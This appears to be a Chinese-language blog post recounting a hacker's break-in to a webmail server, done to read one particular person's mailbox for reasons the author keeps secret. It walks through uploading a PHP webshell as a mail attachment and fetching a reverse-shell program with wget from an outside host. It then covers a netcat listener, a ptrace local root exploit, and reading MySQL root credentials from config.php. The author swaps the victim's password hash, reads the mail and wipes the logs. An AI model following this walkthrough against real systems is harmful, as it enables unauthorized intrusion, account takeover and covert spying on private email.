自從我承擔(dān)起一個項(xiàng)目的負(fù)責(zé)人后，原本沒有規(guī)律的生活現(xiàn)在更變的沒有頭緒了........時(shí)間的因素決定了自己無法去做一些想做的事情。但是有些時(shí)候又不得不去做一些不想做的事情。。。。。。
得到一個MAIL信箱地址，我想拿到這個信箱的密碼。至于什么原因促使我必須要拿到此信箱的密碼我在這里就保密。。。。。
要得到一個信箱的密碼？暴力破解？枚舉探測？NO！
一聽暴力、枚舉，我心都麻。。。。我害怕暴力、更害怕枚舉：）
首先打開此信箱的登陸地址 http://mail.xxx.com.cn
簡單了看了一下也沒發(fā)現(xiàn)什么漏洞，在打開其主頁http://www.xxx.com.cn
看看全都是一些HTML頁面，連ASP都沒有，心想這下不好辦了，ASP代碼漏洞，數(shù)據(jù)庫插入漏洞統(tǒng)統(tǒng)派不上用場，好不容易有個論壇欄目還是空地，估計(jì)還沒開。按慣例吧，看看是什么系統(tǒng)，心想應(yīng)該是LINUX的吧，一般像郵局這些單位都比較喜歡用這類系統(tǒng)
ping www.xxx.com.cn
Pinging www.xxx.com.cn [61.xxx.xxx.xxx] with 32 bytes of data:
Reply from 61.xxx.xxx.xxx: bytes=32 time

501 Method
Not Implemented

Method Not Implemented

 to /index.html not supported.

Invalid method in request 



Apache/1.3.12 Server at www.xxx.com.cn Port 80

Connection to host lost.
看到了我想了解到的信息 Apache/1.3.12 ，WEB是用APACHE架設(shè)的，從PING值以及80返回的信息來看，判斷對方的主機(jī)應(yīng)該是linux系統(tǒng)。（此以上判斷方法只是做為常用的判斷手法，但不包含所有的服務(wù)器都可以用此方法判斷出正確的xx作系統(tǒng)，有些管理員沒事干的時(shí)候可以改改PING值，改改WEB返回的版本信息，那么你得到的將會是一個錯誤的信息了）
從WEB的整個站點(diǎn)來看沒有什么可利用的東西，只開了80、25、110端口，沒開遠(yuǎn)程TELNET管理，說不定還有_blank">防火墻。估計(jì)遠(yuǎn)程溢出等等程序都沒有利用的余地了。沒辦法只好在回到mail.xxx.com.cn上看看，看著信箱登陸頁面發(fā)呆著。。。。輸入信箱用戶名xxx密碼：假密碼（如果這時(shí)候要是碰巧輸入的密碼是對的那會如何？）
希望可以返回一些有用的錯誤信息，可見也很小氣，只返回了，密碼或者用戶名錯誤，什么都沒了。。。無語。。。。。。
眼睛一亮，上面這么大的圖片寫著免費(fèi)注冊，為什么不注冊一個進(jìn)去看看呢？正高興的去點(diǎn)，怎么也點(diǎn)不開，還以為鼠標(biāo)壞了呢。原來管理員把注冊的連接地址去掉了，不允許注冊。這是過分。。。
打開此頁面仔細(xì)查看原代碼，希望可以找到我需要的信息：（











用戶名：



口　令：
　
　忘記密碼-->



IP安全
-->

看到了mail/login.php、getpw.html與cert/index.html
第一個是驗(yàn)證登陸頁面login.php，請求后沒找到可利用漏洞，getpw.htm？難道是找回密碼的頁面？可惜請求此頁面提示找不到該頁，我想是管理員刪除了吧。在接著請求cert/index.html 老天！真好，竟然是注冊新用戶的頁面。（PS：我在想為何管理員刪除了getpwd.htm為何留下了這個申請頁面？難道是為了方便自己開新用戶？那他用ADMIN帳號直接開用戶不是更好？不解中。。。）
填好相關(guān)信息我注冊了一個帳號為 test密碼為test，登陸進(jìn)去了高興。。。。。。別人是不是在想就注冊一個普通的信箱用戶也高興。。。。。：（
我的思路是上傳一個webshell上去，然后就好辦了。但是怎么上傳上去呢，這個是個問題。注意有了，看到他是支持PHP的，那么APACHE的目錄應(yīng)該是不支持ASP的，找了個PHP的WEBSHELL。接著，郵件，發(fā)給誰？當(dāng)然是發(fā)給自己了 上傳wehbshell.php然后OK點(diǎn)發(fā)送，就自己給自己發(fā)了一封信，附件里載著我的希望。。。webshell.php，現(xiàn)在的思路是如何知道webshell.php的真實(shí)訪問地址，憑著入侵積累的經(jīng)驗(yàn)，不停止的對附件構(gòu)造偽造的請求，終于返回了我需要的錯誤信息，判斷一下便的到了真實(shí)的地址為
http://mail.xxx.com.cn/file/webshell.php
好了，得到一個SHELL了
uname 得到確實(shí)是linux的系統(tǒng)
ls -l
看一下文件
現(xiàn)在只是一個WEBSHELL環(huán)境，xx作起來及不舒服，還是先得到一個CMD下的SHELL好，找出一個LINUX的反向連接程序，這樣用NC將會得到一個本地SHELL，那么LINUX來說本地溢出提升到ROOT權(quán)限不是更容易了。開始。。。
wget http://xxx.com/bd.c -O /tmp/door.c
把db.c傳到TMP下改名為 door.c
注：只有對TMP目錄里才有寫的權(quán)限
gcc -o /tmp/door /tmp/door.c
把door.c編譯
接著在PHP的SHELL里在輸入
/tmp/door 211.xx.xxxx.xxx
要反彈連接到的機(jī)器IP（211.xxx.xxx.xxx為我的機(jī)器IP）
然后我在本機(jī)上開
nc -l -vv -p 4000
接著一會便出現(xiàn)了反彈成功的信息
uid 看了一下
接著提升權(quán)限到root
wget http://xxxx.xxx.xxxx/ptrace-kmod.c
下載到機(jī)器上
gcc -o ptrace-kmod ptrace-kmod.c
編譯ptrace-kmod.c
運(yùn)行ptrace-kmod
溢出成功，拿到了ROOT權(quán)限
ls -l
看到確定WEBMAIL的目錄位置
然后進(jìn)入到WEBMAIL的目錄里ls -l
看到config.php文件
接著cat config.php
得到MYSQL的用戶名為:root 密碼為xxx
MAIL的數(shù)據(jù)庫為webmail
好了，本地進(jìn)行登陸MYSQL
mysql -u root -p
輸入密碼后進(jìn)入了mysql
查看我需要的信箱用戶xxx
select * from webmail where pw_name=’xxx’;
返回
----------------------------------------------------------------
pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir
pw_shell
xxx mail.xxx.com.cn ftczP2YoArY7o 0 0 xxx /home/vp
opmail/domains/mail.xxx.com.cn/D/xxx 10485760
-------------------------------------------------------------------
看到了，我要的用戶xxx的密碼是 ftczP2YoArY7o，很明顯是加密過的，既然加密過的，我就改他密碼，然后進(jìn)他的郵箱
select * from webmail where pw_name=’test’;
看我自己剛才注冊的用戶名信息
----------------------------------------------------------------
pw_name pw_domain pw_passwd pw_uid pw_gid pw_gecos pw_dir
pw_shell
test mail.xxx.com.cn ft6GFs8hTv26 0 0 test /home/vp
opmail/domains/mail.xxx.com.cn/D/xxx 10485760
-------------------------------------------------------------------
好了，看到我注冊的test密碼是ft6GFs8hTv26
update webmail;
update webmail set pw_passwd=’ft6GFs8hTv26 ’ where pw_name=’xxx’;
把用戶名為xxx的密碼改為test
順便我也改了他的ADMIN和WEBMASTER的進(jìn)去看一下，得到他的MAIL真的是沒有管理員，難怪管理員沒把那個申請的頁面刪除，還真是為了給自己用起來方便，呵呵?？赐晡宜枰男畔⒑?，在把他們的密碼恢復(fù)。然后清除了日志，OK，此次入侵測試成功完成
對方的主機(jī)系統(tǒng)為linux 8.0的
上面用到的溢出代碼，我都放在下再站的LINUX/exploits目錄里，有需要的朋友可以自己去下。

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。